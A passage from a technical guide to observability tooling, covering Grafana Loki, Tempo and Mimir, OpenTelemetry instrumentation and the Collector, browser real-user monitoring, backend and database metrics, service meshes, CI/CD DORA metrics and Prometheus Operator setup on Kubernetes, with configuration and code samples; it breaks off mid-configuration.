### The Grafana Ecosystem
The Grafana ecosystem has expanded significantly through both in-house development and Grafana Labs' acquisition of several observability companies. The core open-source stack is commonly abbreviated LGTM (Loki, Grafana, Tempo, Mimir):
|Tool|Category|Primary Use|Storage Backend|Scale|
|---|---|---|---|---|
|Grafana|Visualization|Dashboards, alerting, exploration|N/A (frontend)|Single instance or HA|
|Grafana Loki|Log aggregation|Log storage and querying|Object storage (S3/GCS) + index|Horizontally scalable|
|Grafana Tempo|Distributed tracing|Trace storage and querying|Object storage (S3/GCS)|Horizontally scalable|
|Grafana Mimir|Metrics storage|Long-term Prometheus metrics|Object storage (S3/GCS)|Horizontally scalable|
|Grafana Pyroscope|Continuous profiling|CPU flame graphs, memory profiling|Object storage|Horizontally scalable|
|Grafana OnCall|Incident management|On-call scheduling, escalation|PostgreSQL|HA deployment|
|Grafana k6|Load testing|Performance testing|N/A|Distributed|
**Grafana Loki**
Loki is a log aggregation system designed for efficiency and cost-effectiveness at scale. Unlike Elasticsearch, which indexes the full text of every log entry, Loki indexes only metadata (labels) and stores log content compressed in object storage. This architectural choice reduces storage costs significantly, often cited as 10-50x cheaper than Elasticsearch for equivalent log volumes, though actual savings depend on label cardinality and query patterns.
Loki's query language, LogQL, borrows syntax from PromQL:
Log query (return matching log lines):
```
{namespace="payments", app="payment-service"} |= "ERROR" | json | error_type != ""
```
Metric query (derive metrics from logs):
```
sum(rate({namespace="payments"} |= "payment_processing_failed" [5m])) by (service)
```
The second form — deriving metrics from logs — is a powerful capability that allows alert rules to fire based on log content. However, it should be used judiciously: log-derived metrics are more expensive to evaluate than native Prometheus metrics and have higher latency.
**Grafana Tempo**
Tempo is a distributed tracing backend that stores traces in object storage and indexes them by trace ID. Unlike Jaeger or Zipkin, which typically rely on Elasticsearch or Cassandra as their backing store, Tempo's object storage backend makes it significantly cheaper to operate at scale.
Tempo's TraceQL query language (as of Tempo 2.0) enables attribute-based search across traces:
```
{.service.name="payment-service" && .http.status_code=500 && duration > 2s}
```
This query finds traces containing a span where the payment service returned a 500 error and the span's duration exceeded 2 seconds (note that `duration` in TraceQL is per-span; the `traceDuration` intrinsic filters on total trace duration). These are exactly the traces relevant to a latency-plus-error investigation.
Tempo integrates with Loki and Prometheus via exemplars and derived fields: a log line with a trace ID field can be linked directly to the corresponding trace in Tempo, and a Prometheus metric exemplar can carry a trace ID that links to a representative trace.
**Grafana Mimir**
Mimir is a horizontally scalable, long-term storage solution for Prometheus metrics. It implements the Prometheus remote write API, meaning existing Prometheus instances can be configured to send all their data to Mimir without any application-level changes:
```yaml
# prometheus.yml
remote_write:
- url: https://mimir.internal/api/v1/push
basic_auth:
username: prometheus
password_file: /etc/prometheus/mimir-token
```
Mimir stores data in S3-compatible object storage, making retention periods of years economically practical. It supports multi-tenancy (each team's data is isolated), query federation across multiple Prometheus regions, and Prometheus-compatible query APIs (existing Grafana dashboards work unchanged).
### Grafana-Prometheus Integration
The Prometheus data source in Grafana is configured, via the UI or a provisioning file, with the URL of the Prometheus HTTP API:
```yaml
# /etc/grafana/provisioning/datasources/prometheus.yaml
apiVersion: 1
datasources:
  - name: Prometheus
    type: prometheus
    url: http://prometheus-server:9090
    access: proxy
    isDefault: true
```
Once configured, all Prometheus metrics are available for querying in Grafana dashboards using PromQL directly in panel query editors. Grafana provides a PromQL query builder that aids in constructing queries without requiring knowledge of the full PromQL syntax, but the underlying query language is always PromQL.
**Exemplars** are a critical integration feature between Prometheus and Grafana Tempo. An exemplar is a sample attached to a histogram metric that contains additional metadata — specifically, a trace ID. When a request is processed, the application can record the request's trace ID as an exemplar on its latency histogram. Grafana can then display exemplar points on a latency chart, and clicking an exemplar navigates directly to the corresponding trace in Tempo. This creates a seamless workflow from metrics (the latency spike) to traces (the specific request that was slow).
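The mechanics can be sketched without any client library. Below is a minimal, hypothetical histogram (names invented for illustration) in which each bucket keeps one representative trace ID and renders it using OpenMetrics exemplar syntax (`# {trace_id="..."} value`):

```python
import bisect

class ExemplarHistogram:
    """Toy latency histogram; each bucket keeps one representative trace ID."""

    def __init__(self, name, buckets=(0.1, 0.5, 1.0)):
        self.name = name
        self.buckets = sorted(buckets)
        self.counts = [0] * (len(self.buckets) + 1)     # last slot = +Inf
        self.exemplars = [None] * (len(self.buckets) + 1)

    def observe(self, seconds, trace_id=None):
        # bisect_left gives the first bucket with le >= value (le semantics)
        i = bisect.bisect_left(self.buckets, seconds)
        self.counts[i] += 1
        if trace_id:
            self.exemplars[i] = (trace_id, seconds)     # keep latest as representative

    def expose(self):
        lines, cumulative = [], 0
        for i, le in enumerate(list(self.buckets) + ["+Inf"]):
            cumulative += self.counts[i]                # Prometheus buckets are cumulative
            line = f'{self.name}_bucket{{le="{le}"}} {cumulative}'
            if self.exemplars[i]:
                tid, val = self.exemplars[i]
                line += f' # {{trace_id="{tid}"}} {val}'  # OpenMetrics exemplar syntax
            lines.append(line)
        return "\n".join(lines)

h = ExemplarHistogram("http_request_duration_seconds")
h.observe(0.07)
h.observe(0.43, trace_id="4bf92f3577b34da6")
print(h.expose())
```

Real client libraries (prometheus_client, the OTel SDKs) implement the same idea: the exemplar rides alongside the bucket count and is surfaced only in the OpenMetrics exposition format.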
---
## 5. OpenTelemetry
### Overview and Context
OpenTelemetry (OTel) is a CNCF project that provides a vendor-neutral, language-agnostic standard for telemetry instrumentation. It defines APIs, SDKs, and data protocols for collecting and exporting metrics, logs, and traces from applications.
Before OpenTelemetry, every observability backend had its own instrumentation library. Instrumenting an application for Jaeger required the Jaeger client. Switching to Zipkin required replacing the Jaeger client with the Zipkin client. This vendor lock-in at the instrumentation layer made changing observability backends prohibitively expensive.
OpenTelemetry solves this by separating the instrumentation API (how you record telemetry) from the export protocol (where you send it). An application instrumented with OpenTelemetry can send its telemetry to Prometheus, Grafana Tempo, Datadog, Honeycomb, New Relic, or any other compatible backend — without changing the instrumentation code.
The OpenTelemetry project is the merger of two earlier instrumentation efforts: OpenTracing (a CNCF distributed tracing API) and OpenCensus (a Google-originated metrics and tracing library). OpenTelemetry is their successor and the strategic choice for new instrumentation.
### OpenTelemetry Architecture
The OpenTelemetry architecture consists of three layers:
**1. Language SDKs and APIs**
OpenTelemetry provides SDKs for more than ten languages, including Go, Java, Python, JavaScript/Node.js, .NET, Ruby, PHP, Rust, Swift, and Erlang/Elixir. Each SDK implements the OpenTelemetry API specification.
The API provides the interfaces that application code calls to record telemetry: `tracer.StartSpan()`, `meter.CreateCounter()`, `logger.Emit()`. The SDK provides the implementations of these interfaces, including sampling, resource detection, and export pipeline configuration.
Crucially, the API is a no-op implementation by default. Application libraries can use the OpenTelemetry API without forcing end-users to configure or run OpenTelemetry infrastructure. The SDK registers itself with the API at application startup, activating the instrumentation.
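The pattern behind this design can be illustrated in a few lines of plain Python (the names here are invented, not the real OTel classes): library code calls a stable API that defaults to no-ops, and the application swaps in a real implementation once at startup.

```python
class _NoopSpan:
    def set_attribute(self, key, value):  # recording is a no-op by default
        pass
    def end(self):
        pass

class _NoopTracer:
    def start_span(self, name):
        return _NoopSpan()

_tracer_provider = _NoopTracer()          # module-level default: no-op

def get_tracer():
    """What library code calls; cheap and safe even with no SDK installed."""
    return _tracer_provider

def set_tracer_provider(provider):
    """What the application (the 'SDK') calls once at startup."""
    global _tracer_provider
    _tracer_provider = provider

# A library instruments itself unconditionally:
def handle_request():
    span = get_tracer().start_span("handle_request")
    span.set_attribute("http.route", "/v1/payments")
    span.end()
    return "ok"

handle_request()                          # no SDK registered: nothing is recorded

class RecordingTracer(_NoopTracer):       # the application registers a real implementation
    def __init__(self):
        self.spans = []
    def start_span(self, name):
        self.spans.append(name)
        return _NoopSpan()

sdk = RecordingTracer()
set_tracer_provider(sdk)
handle_request()                          # the same library call now records a span
```

The key property is that the library never needs to know whether an SDK is present; only the application's startup code decides.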
**2. Automatic Instrumentation**
For many frameworks and libraries, OpenTelemetry provides automatic instrumentation that requires no code changes. Automatic instrumentation works by hooking into framework lifecycle events (HTTP request handling, database queries, message consumption) and recording spans and metrics without developer involvement.
Examples:
- Java agent: `java -javaagent:opentelemetry-javaagent.jar -jar application.jar` — instruments all Spring, Hibernate, JDBC, HTTP client, and messaging library calls automatically
- Python: `opentelemetry-instrument python app.py` — instruments Flask, Django, SQLAlchemy, requests, and more
- Node.js: `NODE_OPTIONS="--require @opentelemetry/auto-instrumentations-node/register" node server.js`
Automatic instrumentation provides immediate observability coverage with zero code changes, making it particularly valuable for legacy applications or for achieving initial coverage quickly.
**3. OpenTelemetry Collector**
The OTel Collector is a vendor-agnostic proxy and pipeline for telemetry data. It receives telemetry from applications, processes it (filtering, sampling, enrichment, transformation), and exports it to one or more backends.
The Collector architecture is a pipeline of three components:
```
Receivers → Processors → Exporters
```
**Receivers** accept incoming telemetry in various formats:
- OTLP (OpenTelemetry Protocol) — the native OTel format, over gRPC or HTTP
- Prometheus — scrapes Prometheus metrics endpoints
- Jaeger — accepts Jaeger trace format
- Zipkin — accepts Zipkin trace format
- Fluentd/Fluentbit — accepts log data in Fluentd format
- Kafka — consumes telemetry from Kafka topics
- Host metrics — collects CPU, memory, disk, network from the host
**Processors** transform telemetry in the pipeline:
- `batch` — batches data to reduce export calls
- `memory_limiter` — prevents the Collector from exhausting host memory
- `attributes` — adds, modifies, or removes attributes from spans and metrics
- `filter` — drops telemetry matching specified criteria
- `resource` — adds resource attributes (service name, version, environment)
- `probabilistic_sampler` — samples traces at a configurable rate
- `tail_sampling` — samples traces based on the complete trace (e.g., sample all errors, sample 1% of successful traces)
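The tail-sampling decision can be sketched as follows: a hypothetical policy that keeps every trace containing an error span plus a deterministic ~1% of the rest, decided only after the whole trace has been buffered.

```python
def keep_trace(trace_id, spans, success_rate_pct=1):
    """Tail-sampling decision, made after all spans of the trace have arrived."""
    if any(s.get("status") == "error" for s in spans):
        return True                                   # always keep error traces
    # Hash the trace ID deterministically so every collector instance
    # reaches the same keep/drop decision for the same trace.
    return int(trace_id, 16) % 100 < success_rate_pct

# Buffered traces keyed by trace ID (toy data):
traces = {
    "4bf92f3577b34da6": [{"name": "checkout", "status": "error"}],
    "00000000000000ff": [{"name": "checkout", "status": "ok"}],
}
kept = {tid for tid, spans in traces.items() if keep_trace(tid, spans)}
```

The real `tail_sampling` processor supports composable policies (latency, status code, attribute match, rate limiting), but the core idea is the same: buffer, then decide per complete trace.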
**Exporters** send processed telemetry to backends:
- OTLP — sends to any OTLP-compatible backend (Grafana Tempo, Grafana Mimir, etc.)
- Prometheus — exposes a Prometheus metrics endpoint for Prometheus to scrape
- Jaeger — sends traces to Jaeger
- Loki — sends logs to Grafana Loki
- AWS X-Ray, Azure Monitor, GCP Cloud Trace, Datadog, New Relic, Honeycomb — cloud and commercial backends
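Receivers, processors, and exporters are wired together in the Collector's `service.pipelines` section. A minimal illustrative configuration (endpoints are placeholders):

```yaml
# otel-collector.yaml
receivers:
  otlp:
    protocols:
      grpc:
        endpoint: 0.0.0.0:4317
      http:
        endpoint: 0.0.0.0:4318
processors:
  memory_limiter:        # always first in the pipeline
    check_interval: 1s
    limit_mib: 512
  batch:
    timeout: 5s
exporters:
  otlphttp:
    endpoint: https://tempo.internal:4318
  prometheus:
    endpoint: 0.0.0.0:8889
service:
  pipelines:
    traces:
      receivers: [otlp]
      processors: [memory_limiter, batch]
      exporters: [otlphttp]
    metrics:
      receivers: [otlp]
      processors: [memory_limiter, batch]
      exporters: [prometheus]
```

Note that a component is inactive until it is referenced in a pipeline; defining a receiver alone does nothing.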
## 6. Client Application Observability
### Frontend and Web Application Observability
Frontend observability is the discipline of understanding what real users experience in their browsers and mobile devices, rather than what the backend systems report. A backend that is healthy from a server-side perspective can produce a poor user experience due to slow JavaScript execution, render-blocking resources, third-party script failures, or network conditions outside the backend's control.
### Real User Monitoring (RUM)
Real User Monitoring captures performance and behavior data from actual users' browsers as they use the application. RUM data reflects the real diversity of user environments: different browsers, devices, network connections, geographic locations, and hardware capabilities.
Core RUM metrics are defined by the Web Vitals initiative:
|Metric|Full Name|Threshold|What It Measures|
|---|---|---|---|
|LCP|Largest Contentful Paint|Good: <2.5s / Poor: >4s|When the largest content element renders|
|INP|Interaction to Next Paint|Good: <200ms / Poor: >500ms|Responsiveness to user interaction|
|CLS|Cumulative Layout Shift|Good: <0.1 / Poor: >0.25|Visual stability during page load|
|FCP|First Contentful Paint|Good: <1.8s / Poor: >3s|When first content renders|
|TTFB|Time to First Byte|Good: <800ms / Poor: >1.8s|Server and network response time|
These metrics are collected using the browser's Performance API (support for individual entry types varies by engine; LCP, for example, is not reported by every browser):
```javascript
// Using the PerformanceObserver API
const observer = new PerformanceObserver((list) => {
for (const entry of list.getEntries()) {
if (entry.entryType === 'largest-contentful-paint') {
sendToCollector({
metric: 'lcp',
value: entry.startTime,
page: window.location.pathname,
connection: navigator.connection?.effectiveType,
userAgent: navigator.userAgent,
});
}
}
});
observer.observe({ entryTypes: ['largest-contentful-paint', 'layout-shift', 'longtask'] });
```
### Browser Telemetry with OpenTelemetry
The OpenTelemetry JavaScript SDK supports browser environments, enabling the same trace propagation model used in backend services to be applied in the browser:
```javascript
import { WebTracerProvider } from '@opentelemetry/sdk-trace-web';
import { BatchSpanProcessor } from '@opentelemetry/sdk-trace-base';
import { OTLPTraceExporter } from '@opentelemetry/exporter-trace-otlp-http';
import { ZoneContextManager } from '@opentelemetry/context-zone';
import { B3Propagator } from '@opentelemetry/propagator-b3';
import { Resource } from '@opentelemetry/resources';
import { SemanticResourceAttributes } from '@opentelemetry/semantic-conventions';
import { registerInstrumentations } from '@opentelemetry/instrumentation';
import { FetchInstrumentation } from '@opentelemetry/instrumentation-fetch';
import { DocumentLoadInstrumentation } from '@opentelemetry/instrumentation-document-load';
const provider = new WebTracerProvider({
resource: new Resource({
[SemanticResourceAttributes.SERVICE_NAME]: 'payment-frontend',
[SemanticResourceAttributes.SERVICE_VERSION]: '2.1.0',
'app.environment': 'production',
}),
});
provider.addSpanProcessor(
new BatchSpanProcessor(new OTLPTraceExporter({
url: 'https://telemetry.internal/v1/traces',
}))
);
provider.register({
contextManager: new ZoneContextManager(),
propagator: new B3Propagator(),
});
registerInstrumentations({
instrumentations: [
new FetchInstrumentation({
propagateTraceHeaderCorsUrls: [/^https:\/\/api\.example\.com/],
}),
new DocumentLoadInstrumentation(),
],
});
```
With this configuration, every `fetch()` call from the browser generates a span and injects trace context headers (B3 format, per the propagator configured above) into the HTTP request. A backend configured to understand the same propagation format continues the trace from the same trace ID. The resulting trace spans both the frontend and backend, giving a complete picture of the user's request.
### Frontend Performance Observability
Beyond Web Vitals, production frontend observability requires:
**Error tracking:** Uncaught JavaScript errors, unhandled promise rejections, and resource loading failures must be captured and correlated with the user session and browser context.
```javascript
window.addEventListener('error', (event) => {
telemetry.recordError({
message: event.message,
stack: event.error?.stack,
filename: event.filename,
line: event.lineno,
sessionId: getCurrentSessionId(),
traceId: getCurrentTraceId(),
});
});
window.addEventListener('unhandledrejection', (event) => {
telemetry.recordError({
message: event.reason?.message || String(event.reason),
type: 'unhandled_rejection',
sessionId: getCurrentSessionId(),
});
});
```
**Navigation timing:** Single-page applications have complex navigation patterns. Tracking route changes and their performance is essential:
```javascript
// For React applications (assumes `tracer` was obtained from a registered provider)
import { useEffect } from 'react';
const withObservability = (Component, routeName) => {
return function ObservedComponent(props) {
useEffect(() => {
const span = tracer.startSpan(`navigate.${routeName}`);
return () => span.end();
}, []);
return <Component {...props} />;
};
};
```
**Third-party impact:** Many production web applications load dozens of third-party scripts (analytics, chat widgets, payment forms). These can significantly impact performance and are outside the application team's control. RUM should track the performance contribution of third-party resources separately.
### Correlation with Backend Traces
The critical capability that distinguishes modern frontend observability from traditional RUM is trace correlation. When the frontend creates a trace span for an API call and injects the trace ID into the request headers, the backend continues that trace. The result is a single trace that spans the browser, the CDN, the API gateway, the backend services, and the database.
This end-to-end trace allows engineers to:
- Determine whether a slow user experience is caused by frontend JavaScript, network latency, or backend processing
- Identify which specific backend service is responsible for a slow API response observed in RUM data
- Correlate user-impacting incidents with backend errors without requiring users to report them
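The propagation mechanism behind this correlation is the W3C Trace Context `traceparent` header (`version-traceid-spanid-flags`). Generating and parsing it needs nothing beyond the standard library, as this sketch shows:

```python
import re
import secrets

def make_traceparent(sampled=True):
    """Build a W3C traceparent header: 00-<16-byte trace id>-<8-byte span id>-<flags>."""
    trace_id = secrets.token_hex(16)        # 32 hex chars
    span_id = secrets.token_hex(8)          # 16 hex chars
    flags = "01" if sampled else "00"
    return f"00-{trace_id}-{span_id}-{flags}"

_TRACEPARENT = re.compile(r"^00-([0-9a-f]{32})-([0-9a-f]{16})-([0-9a-f]{2})$")

def parse_traceparent(header):
    """Return (trace_id, parent_span_id, sampled) or None if malformed."""
    m = _TRACEPARENT.match(header)
    if not m:
        return None
    trace_id, span_id, flags = m.groups()
    return trace_id, span_id, bool(int(flags, 16) & 0x01)

header = make_traceparent()
trace_id, parent_span, sampled = parse_traceparent(header)
```

In practice the OTel SDK propagators do this (plus validation rules such as rejecting all-zero IDs); the sketch only shows the wire format that ties browser, gateway, and backend spans into one trace.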
---
## 7. Backend Observability
### API Observability
An observable API exposes the four golden signals as metrics, produces structured logs for every request and error, and participates in distributed tracing. Together, these three instrumentation points cover the API's externally observable behavior.
**Standard HTTP server metrics** (RED method — Rate, Errors, Duration):
```prometheus
# Request rate
http_requests_total{method="POST", endpoint="/v1/payments", status="200"}
# Error rate
http_requests_total{method="POST", endpoint="/v1/payments", status=~"5.."}
# Latency distribution (histogram)
http_request_duration_seconds_bucket{endpoint="/v1/payments", le="0.1"}
http_request_duration_seconds_bucket{endpoint="/v1/payments", le="0.5"}
http_request_duration_seconds_bucket{endpoint="/v1/payments", le="1.0"}
```
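From these series, the RED signals are derived with `rate()` and `histogram_quantile()`; a typical pair of panel queries (label names as above):

```prometheus
# Error ratio over the last 5 minutes
sum(rate(http_requests_total{status=~"5.."}[5m]))
  / sum(rate(http_requests_total[5m]))

# p95 latency per endpoint, computed from histogram buckets
histogram_quantile(0.95,
  sum(rate(http_request_duration_seconds_bucket[5m])) by (le, endpoint))
```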
**USE method for resource observability** (Utilization, Saturation, Errors):
```prometheus
# Connection pool utilization
db_pool_connections_active / db_pool_connections_max
# Thread pool saturation (queue depth)
http_server_thread_pool_queue_depth
# File descriptor saturation (exhaustion surfaces as accept/connect errors)
process_open_fds / process_max_fds
```
### Microservices Observability
In a microservices architecture, each service is independently deployable and independently observable. The following instrumentation is the minimum standard for any production microservice:
**Service-level metrics:**
- Request rate (counter)
- Error rate by type (counter, with error type label)
- Latency distribution (histogram, by endpoint and status)
- Active connections / in-flight requests (gauge)
- Dependency call rates and latency (per downstream service)
- Circuit breaker state (gauge: 0=closed, 1=open)
**Structured request log fields:**
```json
{
"timestamp": "2024-03-15T14:23:45.123Z",
"level": "INFO",
"event": "http_request",
"method": "POST",
"path": "/v1/payments",
"status": 200,
"duration_ms": 145,
"request_id": "req-abc123",
"trace_id": "4bf92f3577b34da6",
"span_id": "00f067aa0ba902b7",
"user_id": "user-789", // only if relevant and permitted
"service": "payment-service",
"version": "2.1.0",
"environment": "production"
}
```
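A minimal way to emit logs in this shape with the standard library is a JSON `logging.Formatter`. This is a sketch: field names follow the example above, and in a real service the trace and span IDs would be read from the active span context rather than passed by hand.

```python
import json
import logging
import time

class JsonFormatter(logging.Formatter):
    """Render each log record as one JSON object per line."""

    def format(self, record):
        entry = {
            "timestamp": time.strftime(
                "%Y-%m-%dT%H:%M:%S", time.gmtime(record.created)
            ) + f".{int(record.msecs):03d}Z",
            "level": record.levelname,
            "event": record.getMessage(),
            "service": "payment-service",       # placeholder resource attributes
            "environment": "production",
        }
        # Extra fields (status, duration_ms, trace_id, ...) pass through as-is
        entry.update(getattr(record, "fields", {}))
        return json.dumps(entry)

logger = logging.getLogger("request")
handler = logging.StreamHandler()
handler.setFormatter(JsonFormatter())
logger.addHandler(handler)
logger.setLevel(logging.INFO)

logger.info("http_request", extra={"fields": {
    "method": "POST", "path": "/v1/payments", "status": 200,
    "duration_ms": 145, "trace_id": "4bf92f3577b34da6",
}})
```

One JSON object per line keeps the output directly ingestible by Promtail's `json` pipeline stage without multiline handling.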
**Trace attributes for HTTP spans:**
```
http.method: POST
http.route: /v1/payments
http.status_code: 200
http.request_content_length: 234
http.response_content_length: 145
net.peer.ip: 10.0.0.15
net.peer.port: 443
```
### Database Observability
Databases are frequently the bottleneck in production systems. Observable database instrumentation covers both the application side (how the application calls the database) and the database side (how the database serves queries).
**Application-side database metrics:**
```prometheus
# Query duration histogram (by operation type and table)
db_query_duration_seconds_bucket{operation="SELECT", table="orders", le="0.01"}
# Connection pool metrics
db_pool_connections_active{database="orders_db"}
db_pool_connections_idle{database="orders_db"}
db_pool_wait_duration_seconds_sum{database="orders_db"}
# Query error rate
db_query_errors_total{operation="INSERT", table="transactions", error_type="deadlock"}
```
**PostgreSQL database-side metrics** (via postgres_exporter):
```prometheus
# Active connections vs max
pg_stat_database_numbackends{datname="payments"} / pg_settings_max_connections
# Transaction rates
rate(pg_stat_database_xact_commit{datname="payments"}[5m])
rate(pg_stat_database_xact_rollback{datname="payments"}[5m])
# Cache hit ratio (should be > 99% for OLTP workloads)
pg_stat_database_blks_hit / (pg_stat_database_blks_hit + pg_stat_database_blks_read)
# Long-running queries
pg_stat_activity_max_tx_duration{datname="payments"}
# Table bloat and dead tuples (indicates need for VACUUM)
pg_stat_user_tables_n_dead_tup{relname="orders"}
```
**Slow query detection:**
Database slow queries should produce structured log entries with the query text (sanitized of sensitive values), duration, rows examined, rows returned, and the trace ID of the parent request:
```json
{
"event": "slow_query",
"duration_ms": 2450,
"query": "SELECT * FROM transactions WHERE user_id = $1 AND created_at > $2",
"rows_returned": 10000,
"rows_examined": 500000,
"table": "transactions",
"trace_id": "4bf92f3577b34da6",
"threshold_ms": 100
}
```
### Service Mesh Observability
A service mesh (Istio, Linkerd, Cilium) sits in the network path of all inter-service communication and provides observability automatically, without application code changes. The mesh's sidecar proxy (or eBPF-based dataplane) records metrics and traces for every request passing through it.
Service mesh observability benefits:
**Uniform telemetry:** Every service gets the same metrics (request rate, error rate, latency) regardless of how the service is implemented or instrumented. This is particularly valuable for legacy services or third-party software that cannot be modified.
**mTLS visibility:** The mesh can report on certificate validity, mTLS enforcement violations, and policy denials — security-relevant observability that application code typically does not produce.
**L7 traffic analysis:** The mesh can decode HTTP/gRPC traffic and produce per-route, per-method metrics without any application involvement.
**Dependency topology:** By observing all inter-service calls, the mesh can automatically generate and maintain a real-time service topology map, showing which services depend on which and what the traffic patterns are.
A full trace flow through a service mesh:
```
Browser Request (Chrome)
↓ HTTP/1.1 with traceparent header
CDN/Load Balancer
↓ traceparent propagated
Istio Ingress Gateway
├── Span: gateway.route_request (2ms)
↓ HTTP/2 with traceparent
[Istio Envoy Sidecar] payment-service
├── Span: istio.envoy.inbound (0.5ms)
↓ internal
Payment Service Application
├── Span: payment.ProcessPayment (145ms)
│ ├── Span: db.query.select_account (12ms)
│ ├── Span: fraud.Evaluate (48ms)
│ │ ↓ gRPC with traceparent to fraud-service
│ │ └── [Istio Sidecar] fraud-service
│ │ ├── Span: istio.envoy.inbound (0.3ms)
│ │ └── fraud.EvaluateRequest (47ms)
│ │ └── redis.GET fraud_model (2ms)
│ └── Span: db.query.insert_transaction (45ms)
↓
Response: 200 OK, total duration 150ms
```
---
## 8. Development Observability
### Observability During Development
Observability should not be limited to production. Applying observability practices during development reduces the time to debug issues and ensures that the instrumentation exists before it is needed in production.
**Local telemetry setup:**
A developer workstation running Docker Compose can replicate the full observability stack locally:
```yaml
# docker-compose.observability.yml
services:
otel-collector:
image: otel/opentelemetry-collector-contrib:latest
volumes:
- ./otel-config.yaml:/etc/otel/config.yaml
ports:
- "4317:4317" # OTLP gRPC
- "4318:4318" # OTLP HTTP
prometheus:
image: prom/prometheus:latest
volumes:
- ./prometheus.yml:/etc/prometheus/prometheus.yml
ports:
- "9090:9090"
tempo:
image: grafana/tempo:latest
volumes:
- ./tempo.yaml:/etc/tempo.yaml
ports:
- "3200:3200"
loki:
image: grafana/loki:latest
ports:
- "3100:3100"
grafana:
image: grafana/grafana:latest
environment:
- GF_AUTH_ANONYMOUS_ENABLED=true
- GF_AUTH_ANONYMOUS_ORG_ROLE=Admin
ports:
- "3000:3000"
depends_on: [prometheus, tempo, loki]
```
With this stack running, application code can send telemetry to `localhost:4317` during development, and the developer can immediately query traces, metrics, and logs in Grafana at `localhost:3000`.
### CI/CD Observability
CI/CD pipeline observability extends the observability model to the build and deployment process. Pipelines are distributed systems — they involve multiple runners, shared artifacts, external services — and benefit from the same observability practices applied to production systems.
**Build metrics:**
- Build duration by stage (histogram)
- Test execution time by suite (histogram)
- Test success/failure rate (counter)
- Artifact size (gauge)
- Pipeline queue wait time (histogram)
- Cache hit rate (counter)
**DORA metrics collection:**
DORA metrics can be collected and stored in Prometheus/Mimir for long-term trending and Grafana dashboards:
```python
# CI system webhook handler
from prometheus_client import Counter, Histogram, push_to_gateway
deployment_total = Counter(
'ci_deployments_total',
'Total deployments',
['environment', 'service', 'result']
)
deployment_duration = Histogram(
'ci_deployment_duration_seconds',
'Deployment duration',
['environment', 'service'],
buckets=[30, 60, 120, 300, 600, 1200, 3600]
)
lead_time = Histogram(
'ci_lead_time_seconds',
'Lead time from commit to deployment',
['environment', 'service'],
buckets=[300, 900, 1800, 3600, 7200, 14400, 86400]
)
```
|DevOps Metric|Meaning|Formula|Collection Method|
|---|---|---|---|
|Lead Time|Time from commit to production deploy|`deploy_timestamp - commit_timestamp`|CI system + VCS webhook|
|Deployment Frequency|Number of successful production deploys|`count(deploys) / time_window`|CI/CD pipeline counter|
|Change Failure Rate|% of deploys causing incidents|`incidents_after_deploy / total_deploys`|Deploy events + incident events join|
|MTTR|Mean time to restore service|`restoration_time - incident_start_time`|Incident management platform|
|Build Success Rate|% of CI runs that succeed|`successful_builds / total_builds`|CI platform metrics|
|Flaky Test Rate|% of test runs with non-deterministic results|`flaky_failures / total_test_runs`|Test result analysis|
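As a sketch of the joins in the table above, the DORA numbers can be computed from plain deploy and incident event lists. Timestamps are epoch seconds, the data is invented, and the hard part in practice, attributing an incident to a deploy, is reduced here to a `caused_by` field:

```python
from statistics import mean

deploys = [  # toy event stream from the CI system
    {"id": "d1", "commit_ts": 1000, "deploy_ts": 4600, "ok": True},
    {"id": "d2", "commit_ts": 2000, "deploy_ts": 9200, "ok": True},
    {"id": "d3", "commit_ts": 3000, "deploy_ts": 10000, "ok": True},
]
incidents = [  # toy events from the incident-management platform
    {"caused_by": "d3", "start_ts": 10100, "restored_ts": 11900},
]

# Lead time: commit -> production deploy
lead_time_s = mean(d["deploy_ts"] - d["commit_ts"] for d in deploys)

# Deployment frequency over the observed window (assumed one day here)
deploys_per_day = len(deploys) / 1

# Change failure rate: distinct deploys that caused an incident / all deploys
change_failure_rate = len({i["caused_by"] for i in incidents}) / len(deploys)

# MTTR: incident start -> restoration
mttr_s = mean(i["restored_ts"] - i["start_ts"] for i in incidents)
```

In a Prometheus-backed pipeline these would instead be recording rules over the `ci_deployments_total` and incident counters shown earlier, but the arithmetic is the same.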
### Debugging with Traces
Distributed tracing transforms debugging from a process of reading logs in temporal order and reasoning about causality, to a direct visualization of the request's path and timing.
**Trace-driven debugging workflow:**
1. Identify the failing or slow request: Find the trace ID from a log entry, an error report, or a Grafana Tempo search by attribute.
2. Open the trace in Grafana Tempo: The waterfall view shows all spans, their duration, their parent-child relationships, and any errors.
3. Identify the anomalous span: Look for the longest span, for spans with error status, or for spans that deviate from historical norms (Tempo can show historical percentile comparison).
4. Examine span attributes and events: Every span should carry enough context to understand what it was doing. A database span should show the query; an HTTP client span should show the URL and status; a business logic span should show the relevant entity IDs.
5. Navigate to logs: Using the trace ID embedded in log entries (and the Loki-Tempo correlation in Grafana), open the logs for the specific span's time range. The trace ID filter narrows logs to exactly the request being investigated.
---
## 9. Kubernetes Observability
### The Kubernetes Observability Problem
Kubernetes introduces a layer of abstraction between workloads and the underlying infrastructure. Applications run in pods that are scheduled to nodes; pods may be evicted and rescheduled; nodes may be replaced; the entire cluster state is dynamic. Effective Kubernetes observability requires monitoring at every layer of this abstraction: the infrastructure (nodes), the platform (Kubernetes objects), the runtime (containers), and the workloads (applications).
```
Layer 5: Application (business logic metrics, traces, logs)
Layer 4: Container Runtime (CPU, memory, network, filesystem per container)
Layer 3: Kubernetes Platform (pod state, deployment health, HPA activity)
Layer 2: Node OS (CPU, memory, disk, network at OS level)
Layer 1: Physical/VM Infrastructure (hardware health, hypervisor metrics)
```
Each layer requires different tools and produces different metrics. A problem at any layer can manifest as a symptom at a higher layer. A node memory pressure event (Layer 2) causes pod evictions (Layer 3), which causes application errors (Layer 5). Without visibility at Layer 2 and 3, the Layer 5 symptom appears without explanation.
### Prometheus Operator
The Prometheus Operator is a Kubernetes operator that manages Prometheus and Alertmanager instances as Kubernetes custom resources. It eliminates the need to manually manage Prometheus configuration files.
**Core custom resources:**
`Prometheus` — Defines a Prometheus instance, including storage, retention, resource limits, and which ServiceMonitors to select:
```yaml
apiVersion: monitoring.coreos.com/v1
kind: Prometheus
metadata:
name: prometheus
namespace: monitoring
spec:
replicas: 2
retention: 15d
storage:
volumeClaimTemplate:
spec:
storageClassName: fast-ssd
resources:
requests:
storage: 50Gi
serviceMonitorSelector:
matchLabels:
monitoring: prometheus
ruleSelector:
matchLabels:
monitoring: prometheus
alerting:
alertmanagers:
- namespace: monitoring
name: alertmanager
port: web
```
`ServiceMonitor` — Defines scrape configuration for a service. Teams create ServiceMonitors for their own services without needing to modify the central Prometheus configuration:
```yaml
apiVersion: monitoring.coreos.com/v1
kind: ServiceMonitor
metadata:
name: payment-service
namespace: payments
labels:
